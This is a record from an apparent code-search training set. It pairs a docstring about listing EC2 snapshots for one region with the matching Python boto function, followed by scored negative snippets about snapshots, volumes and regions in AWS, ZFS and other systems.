temperature=row[7],\n salinity=row[8],\n pitch=row[9],\n roll=row[10],\n yaw=row[11],\n altitude=row[12],\n depth_uncertainty=row[13])\n image_data.append(image_data_instance)\n else:\n print \"ERROR: Could not find images.csv file.\"\n\n return image_data", "def images(self, details=True, **query):\n img = _image.ImageDetail if details else _image.Image\n return list(self._list(img, paginated=True, **query))", "def image_list(self):\n return self._image_list", "def getVolumesD(region):\n volumes = getVolumes(region)\n instances = getInstancesD(region)\n\n volumesDicts = []\n for v in volumesDicts:\n volumesDict = {\"id\": v.id,\n \"KEEP-tag\": getKeepTag(v),\n \"instance_KEEP-tag\": getKeepTag(getInstanceOf(v)),\n \"instance\": v.attach_data.instance_id,\n \"status\": v.status,\n \"size\": v.size,\n \"create-time\": v.create_time,\n \"region\": 
v.region.name,\n \"zone\": v.zone,\n \"snapshot_id\": v.snapshot_id,\n \"PROD\": isProduction(v)\n }" ]
[ "0.74375165", "0.669343", "0.6320971", "0.6303299", "0.6287237", "0.6220304", "0.6202331", "0.6175909", "0.60951483", "0.6012867", "0.60106635", "0.59991914", "0.59578496", "0.5940436", "0.5936577", "0.5930096", "0.5909181", "0.5908506", "0.5903435", "0.58975405", "0.5881977", "0.58542645", "0.5824696", "0.5811506", "0.58090603", "0.5804399", "0.5748864", "0.5746013", "0.5739648", "0.57352364", "0.5729914", "0.57246083", "0.57130903", "0.57122064", "0.5712117", "0.5683218", "0.56760406", "0.5664283", "0.565954", "0.56428885", "0.5638608", "0.56307554", "0.5590077", "0.55819523", "0.55762935", "0.5567631", "0.5560035", "0.5530086", "0.55282646", "0.5528015", "0.5516502", "0.55022424", "0.54983443", "0.54899776", "0.5483382", "0.5431314", "0.54280454", "0.542632", "0.5414893", "0.5412504", "0.54099536", "0.5405128", "0.5402845", "0.5402427", "0.54020274", "0.5398716", "0.539489", "0.53826135", "0.5381654", "0.5376785", "0.53668463", "0.53564405", "0.535516", "0.5350805", "0.5345547", "0.53408206", "0.53385067", "0.53366506", "0.5329785", "0.53268486", "0.5323601", "0.5322896", "0.53179944", "0.5315089", "0.53125554", "0.53119045", "0.5311775", "0.531059", "0.5309604", "0.5309284", "0.5305756", "0.5304368", "0.5296124", "0.5291739", "0.5286412", "0.5285465", "0.5281235", "0.528092", "0.5278431", "0.52760303" ]
0.7583085
0
return a list of dictionaries representing snapshots from one region
def getSnapshotsD(region):
    # Can a snapshot belong to more than one AMI? Dunno, keep list just in case (so it never breaks due to it)
    snapshots = getSnapshots(region)
    snapshotsDicts = []
    ims = getImages(region)
    for s in snapshots:
        amis = getAmisOf(s, ims)
        amiIds = []
        amiKeeps = []
        if len(amis) == 1:
            amiIds = amis[0].id.encode()
            amiKeeps = getKeepTag(amis[0])
        elif len(amis) == 0:
            amiIds = "-------no-AMI-found"
            amiKeeps = "-------no-AMI-found"
        else:
            for a in amis:
                amiIds.append(a.id.encode())
                amiKeeps.append(getKeepTag(a))
        snapshotsDict = {"id": s.id,
                         "status": s.status,
                         "region": s.region.name,
                         "progress": s.progress,
                         "start_time": s.start_time,
                         "volume_id": s.volume_id,
                         "volume_size": s.volume_size,
                         "KEEP-tag": getKeepTag(s),
                         "Name": get_name_tag(s),
                         "AMI(s)": amiIds,
                         "AMI_KEEP-tags": amiKeeps,
                         "PROD": isProduction(s),
                         "Description": s.description
                         }
        snapshotsDicts.append(snapshotsDict)
    return snapshotsDicts
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_snapshots(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_snapshots = conn.get_all_snapshots(owner='self')\n except boto.exception.EC2ResponseError:\n return []\n return region_snapshots", "def items(self):\n if self.__has_contents:\n return [dict(zip(['id', 'description', 'size', 'start_time', 'state'],\n [item['SnapshotId'], item['Description'], item['VolumeSize'],\n item['StartTime'], item['State']]))\n for item in self.__response['Snapshots']]\n else:\n return []", "def _list_snapshots(self):\n return self.resource.describe_snapshots(\n Filters=[\n {\n 'Name': 'tag:CreatedBy',\n 'Values': [\n 'AutomatedBackup{}'.format(INTERVAL_TYPE.capitalize())\n ]\n }\n ]\n )", "def getImagesD(region):\n images = getImages(region)\n imageDicts = []\n for im in images:\n imageDict = {\"name\": im.name,\n \"id\": im.id,\n \"region\": im.region.name,\n \"state\": im.state,\n \"created\": im.creationDate,\n \"type\": im.type,\n \"KEEP\": getKeepTag(im),\n \"name_tag\": get_name_tag(im),\n \"snapshots\": getSnapshotsOf(im),\n \"description\": im.description,\n \"PROD\": isProduction(im)\n }\n imageDicts.append(imageDict)\n return imageDicts", "def get_snapshots(self):\n _url = f\"{self.connector.base_url}/projects/{self.project_id}/snapshots\"\n\n response = self.connector.http_call(\"get\", _url)\n self.snapshots = response.json()", "def get_snapshots(self) -> SnapshotListing:\n return self.snapshots", "def vm_snapshotlist(args):\n snapshot = args.snapshot\n name = args.name\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n common.pprint(\"Listing snapshots of %s...\" % name)\n snapshots = k.snapshot(snapshot, name, listing=True)\n if isinstance(snapshots, dict):\n common.pprint(\"Vm %s not found\" % name, color='red')\n return\n else:\n for snapshot in snapshots:\n print(snapshot)\n return", "def get_snapshots(self):\r\n ec2 = self.get_ec2_connection()\r\n rs = ec2.get_all_snapshots()\r\n all_vols = [self.volume_id] + self.past_volume_ids\r\n snaps = []\r\n for snapshot in rs:\r\n if snapshot.volume_id in all_vols:\r\n if snapshot.progress == '100%':\r\n snapshot.date = dateutil.parser.parse(snapshot.start_time)\r\n snapshot.keep = True\r\n snaps.append(snapshot)\r\n snaps.sort(cmp=lambda x,y: cmp(x.date, y.date))\r\n return snaps", "def generateInfoSnapshots(regions):\n print \"Writing snapshots info to output file %s\" % snapshots_data_output_file\n snapshots = []\n for r in regions:\n snapshots += getSnapshotsD(r)\n print \".\" # feedback for the user\n with open(snapshots_data_output_file, 'w') as f2:\n f2.write(\"SNAPSHOTS\\n\")\n f2.write(\n \"Name\\tsnapshot_id\\tKEEP-tag_of_snapshot\\tKEEP-tag_of_AMI\\tproduction?\\tassociated_AMI\\tstart_time\\tstatus\"\n \"\\tregion\\tprogress\\tassociated_volume\\tvolume_size\\tdescription\\n\\n\")\n for s in snapshots:\n f2.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\"\n % (s['Name'], s['id'], s['KEEP-tag'], s['AMI_KEEP-tags'], s['PROD'], s['AMI(s)'], s['start_time'],\n s['status'], s['region'], s['progress'], s['volume_id'], s['volume_size'], s['Description']))", "def snapshots_created(self):\n # log.debug(\"Getting snaps created for volume {0}\".format(self.volume_id))\n snaps_info = []\n for snap in self._derived_snapshots:\n snap_info = {}\n try:\n if snap.volume_id == self.volume_id:\n snap.update()\n snap_info['snap_id'] = snap.id\n snap_info['snap_progress'] = snap.progress\n 
snap_info['snap_status'] = snap.status\n snap_info['snap_desc'] = snap.description\n snaps_info.append(snap_info)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n return snaps_info", "def list_snapshots(args):\n html_doc = document.Document(get_code(args.file))\n edition, region, snapshots = html_doc.list(date=args.edition, region=args.region)\n print('Snapshots for {:s} {:%B %d, %Y}'.format(region.capitalize(), edition))\n for i in range(len(snapshots)):\n print('({:2d}) {!r:} -'.format(i, snapshots[i][1]) +\n ' {0:%B} {0.day:2}, {0:%Y %l:%M:%S.%f %p}'.format(snapshots[i][0]))", "def getSnapshots(self):\n snapshots = []\n for x in self.root.goto('CommonDataObjects/Attachments'):\n for y in x.getList():\n if y['name'] == 'Video Snapshot':\n self.f.seek(y['bidx'])\n blk = Block(self.f)\n sx = blk.goto('res_x').getLong()\n sy = blk.goto('res_y').getLong()\n raw = blk.goto(\"imagedata\").value\n data = zlib.decompress(raw)\n I = np.flipud(np.array(struct.unpack(\"<\" + str(3 * sx * sy) + \"B\", data)).reshape((sy, sx, 3)))\n snapshots.append(I)\n del blk\n return snapshots", "def populate_snapshots(self):\n print \"Populating snapshots info...\"\n snapshots = self.get_all_snapshots()\n\n for i in snapshots:\n\n # find the ami id(s) for this snapshot. API allows for multiple even though I don't think there would be\n associated_ami_ids = self.get_amis_of(i.id)\n\n ami_keep_tags = [Ims.spreadsheet[ami_id]['KEEP_tag'] for ami_id in associated_ami_ids]\n\n self.spreadsheet[i.id] = dict(Name_tag=self.get_name_tag(i), id=i.id, KEEP_tag=self.get_keep_tag(i),\n ami_KEEP_tag=ami_keep_tags, associated_ami_ids=associated_ami_ids,\n PROD_tag=self.is_production(i), start_time=i.start_time,\n region=i.region.name, associated_volume=i.volume_id,\n volume_size=i.volume_size, description=i.description)", "def get_snapshots_of(image):\n snapshot_ids = []\n device_mapping = image.block_device_mapping # dict of devices\n devices = device_mapping.keys()\n for device in devices:\n if device_mapping[device].snapshot_id is not None:\n snapshot_ids.append(device_mapping[device].snapshot_id.encode()) # do I need to have 'encode' here?\n return snapshot_ids", "def list_snapshots(project):\n data = {constants.PROJECT_PARAMETER: project}\n res = requests.post(_url + \"list_snapshots/\", data=data,\n auth=(_username, _password))\n if res.status_code == 200:\n snapshots = json.loads(res.content)\n table = PrettyTable(field_names=[\"Snapshot\", \"Parent\"])\n for snapshot in snapshots:\n table.add_row(snapshot)\n click.echo(table.get_string())\n else:\n click.echo(res.content)", "def getContainerSnapshots(self,node,vmid):\n data = self.connect('get','nodes/%s/lxc/%s/snapshot' % (node,vmid),None)\n return data", "def getSnapshotsOf(image):\n snapshotIds = []\n deviceMapping = image.block_device_mapping # dict of devices\n devices = deviceMapping.keys()\n for d in devices:\n snapshotId = deviceMapping[d].snapshot_id\n if snapshotId is not None:\n snapshotIds.append(snapshotId.encode())\n return snapshotIds", "def database_volume_snapshot_get_list():\n db = database_get()\n\n session = db.session()\n query = session.query(model.VolumeSnapshot)\n\n volume_snapshot_objs = list()\n for volume_snapshot in query.all():\n nfvi_volume_snapshot_data = \\\n json.loads(volume_snapshot.nfvi_volume_snapshot_data)\n nfvi_volume_snapshot = nfvi.objects.v1.VolumeSnapshot(\n nfvi_volume_snapshot_data['uuid'],\n 
nfvi_volume_snapshot_data['name'],\n nfvi_volume_snapshot_data['description'],\n nfvi_volume_snapshot_data['size_gb'],\n nfvi_volume_snapshot_data['volume_uuid'])\n volume_snapshot_obj = objects.VolumeSnapshot(nfvi_volume_snapshot)\n volume_snapshot_objs.append(volume_snapshot_obj)\n return volume_snapshot_objs", "def get_content(self):\r\n content = []\r\n for regiongroup in self.region_groups:\r\n for region in regiongroup.get_content():\r\n # Add date, unique_name and project to the metadata\r\n region[0]['date'] = self.extracted_date\r\n region[0]['unique_name'] = self.unique_name\r\n try:\r\n project = os.path.split(\r\n os.path.split(self.unique_name)[0]\r\n )[1]\r\n except IndexError:\r\n project = ''\r\n region[0]['project'] = project\r\n content.append(region)\r\n return content", "def list_snapshots(self, detail=False, **params):\n url = 'snapshots'\n list_schema = schema.list_snapshots_no_detail\n if detail:\n url += '/detail'\n list_schema = schema.list_snapshots_with_detail\n if params:\n url += '?%s' % urllib.urlencode(params)\n\n resp, body = self.get(url)\n body = json.loads(body)\n self.validate_response(list_schema, resp, body)\n return rest_client.ResponseBody(resp, body)", "def snapshots(self, owner=None, restorable_by=None):\r\n rs = self.connection.get_all_snapshots(owner=owner,\r\n restorable_by=restorable_by)\r\n mine = []\r\n for snap in rs:\r\n if snap.volume_id == self.id:\r\n mine.append(snap)\r\n return mine", "def get_snapshots(dataset=''):\n # filter my tags\n return os.listdir(dataset + ZFS_DEFAULT_SNAPSHOT_DIR)", "def get_snapshots(FIELDS='all'):\n snapinfostr = fork_and_get_output(\"zfs list -t snapshot -H -o {0}\".format(FIELDS).split())\n header = get_zfs_snap_header()\n snapinfo = snapinfostr.splitlines()\n snapobjs = []\n for snapstr in snapinfo:\n snapobjs.append(DataZFS(snapstr, header, 'snapshot'))\n return snapobjs", "def listInstancesRegionZone(region,zone):\n\tprint \"-\"*80\n\tprint \"# Region :\",region,\" Zone\", zone\t\n\tprint \"-\"*80\n\tinstances = getInstancesRegionZone(region,zone)\n\tif instances:\n\t\tfor instance in instances:\n\t\t\tprint \"[\",instance.ami_launch_index,\"]\",instance.ip_address,\" (\",instance.private_ip_address,\") \",instance.instance_type,\" key=\",instance.key_name", "def getVolumesD(region):\n volumes = getVolumes(region)\n instances = getInstancesD(region)\n\n volumesDicts = []\n for v in volumesDicts:\n volumesDict = {\"id\": v.id,\n \"KEEP-tag\": getKeepTag(v),\n \"instance_KEEP-tag\": getKeepTag(getInstanceOf(v)),\n \"instance\": v.attach_data.instance_id,\n \"status\": v.status,\n \"size\": v.size,\n \"create-time\": v.create_time,\n \"region\": v.region.name,\n \"zone\": v.zone,\n \"snapshot_id\": v.snapshot_id,\n \"PROD\": isProduction(v)\n }", "def derived_snapshots(self):\n start_time = time.time()\n log.debug(\"Getting snaps derived from volume {0}.\".format(self.volume_id))\n derived_snapshots = []\n for snap in self.app.cloud_interface.get_all_snapshots():\n try:\n if snap.volume_id == self.volume_id:\n derived_snapshots.append(snap)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n log.debug(\"Got snaps derived from volume {0} in {1} seconds: {2}\"\n .format(self.volume_id, time.time() - start_time, derived_snapshots))\n return derived_snapshots", "def list(self, detailed=True, search_opts=None, marker=None, limit=None,\n sort=None):\n resource_type = \"snapshots\"\n url = 
self._build_list_url(resource_type, detailed=detailed,\n search_opts=search_opts, marker=marker,\n limit=limit, sort=sort)\n return self._list(url, resource_type, limit=limit)", "def test_aws_service_api_snapshots_get(self):\n pass", "def perform_snapshot(context, region, installed_region='us-east-1'):\n LOG.info('Reviewing snapshots in region %s', region)\n\n # fetch these, in case we need to figure out what applies to an instance\n configurations = dynamo.list_configurations(context, installed_region)\n LOG.debug('Fetched all possible configuration rules from DynamoDB')\n\n # build a list of any IDs (anywhere) that we should ignore\n ignore_ids = utils.build_ignore_list(configurations)\n\n # setup some lookup tables\n cache_data = utils.build_cache_maps(context, configurations, region, installed_region)\n all_instances = cache_data['instance_id_to_data']\n instance_configs = cache_data['instance_id_to_config']\n volume_snap_recent = cache_data['volume_id_to_most_recent_snapshot_date']\n\n for instance_id in set(all_instances.keys()):\n # before we go do some work\n if timeout_check(context, 'perform_snapshot'):\n break\n\n if instance_id in ignore_ids:\n continue\n\n snapshot_settings = instance_configs[instance_id]\n\n # parse out snapshot settings\n retention, frequency = utils.parse_snapshot_settings(snapshot_settings)\n\n # grab the data about this instance id, if we don't already have it\n instance_data = all_instances[instance_id]\n\n ami_id = instance_data['ImageId']\n LOG.info('Reviewing snapshots in region %s on instance %s', region, instance_id)\n\n for dev in instance_data.get('BlockDeviceMappings', []):\n # before we go make a bunch more API calls\n if timeout_check(context, 'perform_snapshot'):\n break\n\n # we probably should have been using volume keys from one of the\n # caches here, but since we're not, we're going to have to check here too\n LOG.debug('Considering device %s', dev)\n volume_id = dev['Ebs']['VolumeId']\n\n if volume_id in ignore_ids:\n continue\n\n # find snapshots\n recent = volume_snap_recent.get(volume_id)\n now = datetime.datetime.now(dateutil.tz.tzutc())\n\n # snapshot due?\n if should_perform_snapshot(frequency, now, volume_id, recent):\n LOG.debug('Performing snapshot for %s, calculating tags', volume_id)\n else:\n LOG.debug('NOT Performing snapshot for %s', volume_id)\n continue\n\n # perform actual snapshot and create tag: retention + now() as a Y-M-D\n delete_on_dt = now + retention\n delete_on = delete_on_dt.strftime('%Y-%m-%d')\n\n volume_data = utils.get_volume(volume_id, region=region)\n expected_tags = utils.calculate_relevant_tags(\n instance_data.get('Tags', None),\n volume_data.get('Tags', None))\n\n utils.snapshot_and_tag(\n instance_id,\n ami_id,\n volume_id,\n delete_on,\n region,\n additional_tags=expected_tags)", "def list_snapshots(session, verbose):\n # type: (Session, bool) -> Union[List[str], List[Dict[str,str]]]\n if not session.network:\n raise ValueError(\"Network must be set to list snapshots\")\n url_tail = \"/{}/{}/{}\".format(\n CoordConstsV2.RSC_NETWORKS, session.network, CoordConstsV2.RSC_SNAPSHOTS\n )\n return _get_list(session, url_tail, {CoordConstsV2.QP_VERBOSE: verbose})", "def regions_dict(self):\n regions_dict = dict()\n for i, r in enumerate(self.regions):\n regions_dict[getattr(r, 'ix', i)] = r\n return regions_dict", "def get_volume_snapshots(self, volume):\n LOG.debug('get_volume_snapshot starts')\n pool_name = self.configuration.rbd_pool\n volume_name = 'volume-%s' % encodeutils.safe_encode(volume[\"id\"])\n 
snaps_on_vol = self._get_volume_snapshots(pool_name, volume_name)\n snapshots = list()\n if snaps_on_vol is not None:\n for snap in snaps_on_vol:\n snap_name = str(snap[\"name\"])\n item = dict()\n if snap_name.startswith(\"snapshot-\"):\n # snapshot directly created on volume.\n item[\"type\"] = \"volume_snap\"\n item[\"uuid\"] = snap_name[len('snapshot-'):]\n elif snap_name.startswith(\"volume-\") and \\\n snap_name.endswith(\".clone_snap\"):\n # snapshot used for create volume on volume.\n item[\"type\"] = \"clone_snap\"\n item[\"uuid\"] = snap_name[len(\"volume-\"):-len(\".clone_snap\")]\n elif snap_name.startswith(\"backup.\") and \".snap.\" in snap_name:\n # snapshot used for backup volume.\n item[\"type\"] = \"backup_snap\"\n item[\"uuid\"] = \\\n snap_name[len(\"backup.\"):snap_name.index(\".snap.\")]\n else:\n item[\"type\"] = \"\"\n item[\"uuid\"] = \"\"\n snapshots.append(item)\n\n LOG.debug('volume snapshots: %s', snapshots)\n LOG.debug('get_volume_snapshots finished.')\n return snapshots", "def getStudyRegions():\n comp_name = os.environ['COMPUTERNAME']\n conn = py.connect('Driver=ODBC Driver 11 for SQL Server;SERVER=' +\n comp_name + '\\HAZUSPLUSSRVR; UID=SA;PWD=Gohazusplus_02')\n exclusionRows = ['master', 'tempdb', 'model', 'msdb', 'syHazus', 'CDMS', 'flTmpDB']\n cursor = conn.cursor()\n cursor.execute('SELECT [StateID] FROM [syHazus].[dbo].[syState]') \n for state in cursor:\n exclusionRows.append(state[0])\n cursor = conn.cursor()\n cursor.execute('SELECT * FROM sys.databases')\n studyRegions = []\n for row in cursor:\n if row[0] not in exclusionRows:\n studyRegions.append(row[0])\n studyRegions.sort(key=lambda x: x.lower())\n return studyRegions", "def GetVMSnapshotsList(self):\n try:\n current = self.vmInstance.get_current_snapshot_name()\n snapshots = self.vmInstance.get_snapshots()\n\n if current and snapshots:\n LOGGER.info('Name of current snapshot of virtual machine \"{}\": \"{}\"'.format(VM_NAME, current))\n LOGGER.info('List of all snapshots:')\n\n for i, snap in enumerate(snapshots):\n LOGGER.info(' {}. 
\"'.format(i + 1) + snap.get_name() + '\"')\n\n else:\n LOGGER.warning('No snapshots found for virtual machine \"{}\"!'.format(VM_NAME))\n\n except Exception as e:\n snapshots = None\n LOGGER.debug(e)\n LOGGER.error(traceback.format_exc())\n LOGGER.error('An error occured while getting list of snapshots of virtual machine \"{}\"!'.format(VM_NAME))\n\n return snapshots", "def getInstancesD(region):\n instances = getInstances(region)\n instancesDicts = {\"id\": i.id,\n \"KEEP-tag\": getKeepTag(i),\n \"instance_type\": i.instance_type,\n \"state\": i.state,\n \"launch_time\": i.launch_time,\n \"security_groups\": getGroups(i),\n \"region\": i.region.name,\n \"PROD\": isProduction(i)\n }", "def regions(self):\n return self._regions", "def get_all_reservations(config):\n reservations = []\n region_list = regions(aws_access_key_id=config.keys.api,\n aws_secret_access_key=config.keys.secret)\n for region in region_list:\n _logger.info(\"Searching %s\", region)\n cnx = region.connect(aws_access_key_id=config.keys.api,\n aws_secret_access_key=config.keys.secret)\n for reservation in cnx.get_all_instances():\n _logger.info(\"Found %s %s\", reservation,\n [str(i.id) for i in reservation.instances])\n reservations.append(reservation)\n return reservations", "def regions_json(self, filename):\n with open(filename) as f:\n return json.load(f)", "def getStudyRegions(self):\n exclusionRows = ['master', 'tempdb', 'model', 'msdb', 'syHazus', 'CDMS', 'flTmpDB']\n self.cursor.execute('SELECT [StateID] FROM [syHazus].[dbo].[syState]') \n for state in self.cursor:\n exclusionRows.append(state[0])\n query = 'SELECT * FROM sys.databases'\n df = pd.read_sql(query, self.conn)\n studyRegions = df[~df['name'].isin(exclusionRows)]['name']\n studyRegions = studyRegions.reset_index()\n studyRegions = studyRegions.drop('index', axis=1)\n self.studyRegions = studyRegions\n return studyRegions", "def _get_available_regions():\n session = boto3.session.Session()\n\n return session.get_available_regions(service_name='s3')", "def RegionList(self):\n command = \"\"\"\n IPython.notebook.kernel.execute(\"RegionList=\" + JSON.stringify(JS9.GetShapes(\"regions\", {{display: '{wid}JS9'}})));\n \"\"\".format(wid=self.wid)\n get_ipython().run_cell_magic('javascript', '', command)", "def api_get_regions():\n db_session = DBSession()\n\n rows = []\n criteria = '%'\n if request.args and request.args.get('q'):\n criteria += request.args.get('q') + '%'\n else:\n criteria += '%'\n\n regions = db_session.query(Region).filter(Region.name.like(criteria)).order_by(Region.name.asc()).all()\n if len(regions) > 0:\n if request.args.get('show_all'):\n rows.append({'id': 0, 'text': 'ALL'})\n for region in regions:\n rows.append({'id': region.id, 'text': region.name})\n\n return jsonify(**{'data': rows})", "def read_regions(namefile):\n db = shelve.open(namefile)\n key_firms = db['nif']\n regions = db['regions']\n methodvalues = db['methodvalues']\n db.close()\n return key_firms, regions, methodvalues", "def regions(self, member_state):\n rates = self._get_rates(member_state)\n return list(rates.regions.keys())", "def get_regions(self):\n return self._regions", "def region(self):\n return [node.region for node in self]", "def list(self, detailed=True, search_opts=None):\n query_string = utils.build_query_param(search_opts, sort=True)\n\n detail = \"\"\n if detailed:\n detail = \"/detail\"\n\n return self._list(\"/group_snapshots%s%s\" % (detail, query_string),\n \"group_snapshots\")", "def get_snapshot(project, zone, instance):\n 
snapshot_disks(project, zone, *get_disks(instance))", "def jail_snapshot_list(jnid = ''):\n jname = jnid\n if 'BASE-' in jnid:\n jnid = '/BASE-RW/%s@' % jnid\n else:\n jnid = '/%s@' % jnid\n \n try:\n jsnap = subprocess.check_output(\"zfs list -t snapshot |grep \"+jnid, shell=True)\n except:\n msg = \" ERROR: No zfs snapshots found for '%s'\" % (jnid)\n log(msg)\n return False\n\n jsnap = jsnap.split('\\n')\n jsnapn = []\n for i in jsnap:\n i = i.split(' ')\n while True:\n try:\n i.remove(\"\")\n except ValueError:\n break\n jsnapn.append(i)\n\n lmen = ['Number', \"'%s' current snapshots\" % jname, 'Size']\n del jsnapn[-1]\n jsn = 0\n jsnn = []\n for i in jsnapn:\n jsnn.append([jsn, i[0], i[3]])\n jsn = jsn + 1\n\n return [jsnn, lmen]", "def get_snapshots(\n self, name=None, labels=None, max_results=None, page_token=None):\n labels = labels or {}\n params = {}\n filters = []\n if name:\n filters.append('(name = %s)' % name)\n for key, value in sorted(labels.items()):\n filters.append('(labels.%s = %s)' % (key, value))\n if filters:\n # e.g. (name = snapshot-name) AND (label.version = latest)\n params['filter'] = ' AND '.join(filters)\n if max_results:\n params['maxResults'] = max_results\n if page_token:\n params['pageToken'] = page_token\n return self.call_api('/global/snapshots', params=params)", "def test_snapshot_listing(self):\n page_size = 5\n with mock.patch.object(TDRClient, 'page_size', page_size):\n paged_snapshots = self._public_tdr_client.snapshot_names_by_id()\n snapshots = self._public_tdr_client.snapshot_names_by_id()\n self.assertEqual(snapshots, paged_snapshots)", "def get_instances(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_instances = []\n reservations = conn.get_all_reservations()\n for reservation in reservations:\n for instance in reservation.instances:\n region_instances.append(instance)\n except boto.exception.EC2ResponseError:\n return []\n return region_instances", "def load_snapshot(base_path, snap_num, subvolumes, group, fields, matches):\n n_init = []\n\n snap_key = 'N{}_ThisFile_Redshift'.format('groups' if group == 'Haloprop' else 'subgroups')\n for subvolume in subvolumes: \n n_init.append(load_header(base_path, subvolume)[snap_key][snap_num])\n \n # initialize objects structure\n result = {}\n \n with h5py.File(file_path(base_path, subvolumes[0], 'subvolume'), 'r') as f:\n # galprop and haloprop both have a redshift quantity so we can use that to query for the snapshot we want\n filter_field = '{}Redshift'.format(group)\n \n if not fields:\n fields = list(f[group].keys())\n\n # make sure the redshift field is included in fields\n if filter_field not in fields:\n fields.append(filter_field) \n \n for field in fields:\n if field not in f[group].keys():\n raise Exception(\"Catalog does not have requested field [{}]!\".format(field))\n\n shape = list(f[group][field].shape)\n shape[0] = np.sum(n_init)\n\n # allocate within return dict\n result[field] = np.zeros(shape, dtype=f[group][field].dtype)\n\n if matches:\n with h5py.File(file_path(base_path, subvolumes[0], 'matches'), 'r') as f:\n for field in f[group].keys():\n result[field] = np.zeros(shape, dtype=f[group][field].dtype)\n\n header = load_header(base_path, subvolumes[0])\n filter_condition = header['Redshifts'][snap_num]\n\n offset = 0\n\n for subvolume in subvolumes:\n subvol_result = load_subvolume(base_path, subvolume, group, fields, matches, False)\n\n idx = subvol_result[filter_field][:] == filter_condition\n\n for field in subvol_result.keys():\n if 
len(subvol_result[field].shape) != 1:\n result[field][offset:offset+n_init[0], :] = subvol_result[field][idx]\n else:\n result[field][offset:offset+n_init[0]] = subvol_result[field][idx]\n\n offset += n_init[0]\n del n_init[0]\n \n return result", "def get_regions(locale):\n\n def json_file(name):\n return os.path.join(json_dir, 'regions', '%s.json' % name)\n\n filepath = json_file(locale)\n\n if not os.path.exists(filepath):\n filepath = json_file('en-US')\n if not os.path.exists(filepath):\n raise Exception('Unable to load region data')\n\n with codecs.open(filepath, encoding='utf8') as fd:\n return json.load(fd)", "def get_workspace_snapshot(self) -> Mapping[str, WorkspaceLocationEntry]:", "def get_snapshots_tree(self):\n\t\treturn Job(SDK.PrlVm_GetSnapshotsTree(self.handle)[0])", "def list_snapshots(self, detailed=True):\n aname = \"cinder_v%s.list_snapshots\" % self.version\n with atomic.ActionTimer(self, aname):\n return (self._get_client()\n .volume_snapshots.list(detailed))", "def data_snapshot(self) -> Dict[str, Any]:\n self.__logger.debug('Eva.data_snapshot called')\n return self.__http_client.data_snapshot()", "def snapshot_metadata(self):\n return self._snapshot_metadata", "def take_snapshot():\n df = scrape()\n for i in df.index:\n single = df.loc[i]\n # create or get locations\n loc, created = Location.objects.get_or_create(\n name=single['Location'],\n all_stands=single['Stands'],\n coordinates=single['Coords']\n )\n # add a new snapshot\n obj = Snapshot(\n location=loc,\n avail_bikes=single['Bikes'],\n free_stands=single['Free stands'],\n timestamp=datetime.now(tz=timezone('Europe/Warsaw'))\n )\n obj.save()", "def get_list(self, regions = None):\r\n \r\n data = []\r\n if regions is None:\r\n regions = ['PHA','STC','JHC','PLK','KVK','ULK','LBK','HKK','PAK','OLK','MSK','JHM','ZLK','VYS']\r\n for region in regions:\r\n cache_file = os.path.join(self.__folder, self.__cache.format(region))\r\n if region in self.__stored_data.keys():\r\n data.append(self.__stored_data[region])\r\n elif os.path.isfile(cache_file):\r\n with gzip.open(cache_file, \"rb\") as file_data:\r\n self.__stored_data[region] = pickle.load(file_data)\r\n data.append(self.__stored_data[region])\r\n else:\r\n parsed_data = self.parse_region_data(region)\r\n with gzip.open(cache_file, \"wb\") as file_data:\r\n pickle.dump(parsed_data, file_data, protocol=-1)\r\n self.__stored_data[region] = parsed_data\r\n data.append(parsed_data)\r\n concatenated_data = []\r\n for j in range(65):\r\n concatenated_data.append(np.concatenate([data[i][1][j] for i in range(len(data))]))\r\n return (data[0][0], concatenated_data)", "def __init__(self):\n self.regions = []", "def getDataBaseLists(data, db):\n # The list of regions - ex: \"46 60 26 23\" for region of coordinates 46.60 26.23\n regions = []\n # The list of lists of records - each region can have multiple records\n records = []\n try:\n # Loop through all data in database dictionary\n for reg, rec in data:\n # Store the region name in list\n regions.append(reg)\n # Create a new list for the current region to store its records\n rec_list = []\n # Loop through records dictionary to get records name and data\n for rec_name, rec_data in rec.items():\n try:\n # Store all records for the current region as Record object\n rec_list.append(Record(rec_name, Data(rec_data)))\n except TypeError as err:\n # Write the exception in logging\n logging.exception(str(err))\n # Something was wrong with the current record - delete it from database\n 
db.child(Constants.data_path).child(reg).child(rec_name).remove()\n return None, None\n # Store the records list of the current region in the list\n records.append(rec_list)\n return regions, records\n except TypeError as err:\n # Write the exception in logging\n logging.exception(str(err))\n # There was some invalid data in database\n print(Texts.invalid_database_data)\n return None, None", "def region(self):\n return regions.lookup(self.state)", "def list(region, profile):\n ini_data = {}\n environment = {}\n\n if region:\n environment['region'] = region\n else:\n environment['region'] = find_myself()\n\n if profile:\n environment['profile'] = profile\n\n ini_data['environment'] = environment\n if start_list(ini_data):\n sys.exit(0)\n else:\n sys.exit(1)", "def get_exploration_snapshots_metadata(exploration_id, limit):\n exploration = get_exploration_by_id(exploration_id)\n oldest_version = max(exploration.version - limit, 0) + 1\n current_version = exploration.version\n version_nums = range(current_version, oldest_version - 1, -1)\n\n return [exp_models.ExplorationSnapshotModel.get_metadata(\n exploration_id, version_num\n ) for version_num in version_nums]", "def get_region_dict(self):\n if self.initiated is False:\n raise RuntimeError(\"Initiate first\")\n\n return self._region_dict", "def getVCDRPGSnaps(**kwargs):\n strVCDRProdURL = kwargs['strVCDRProdURL']\n sessiontoken = kwargs['sessiontoken']\n if kwargs['cloud_fs_id'] is None:\n print(\"Please specify the ID of the cloud file system using '-cloud-fs-id'\")\n sys.exit(1)\n if kwargs['protection_group_id'] is None:\n print(\"Please specify the ID of the protection group using '-protection-group-id'\")\n sys.exit(1)\n cloud_fs_id = kwargs['cloud_fs_id']\n pg_id = kwargs['protection_group_id']\n if kwargs['protection_group_snap_id'] is None:\n json_response = 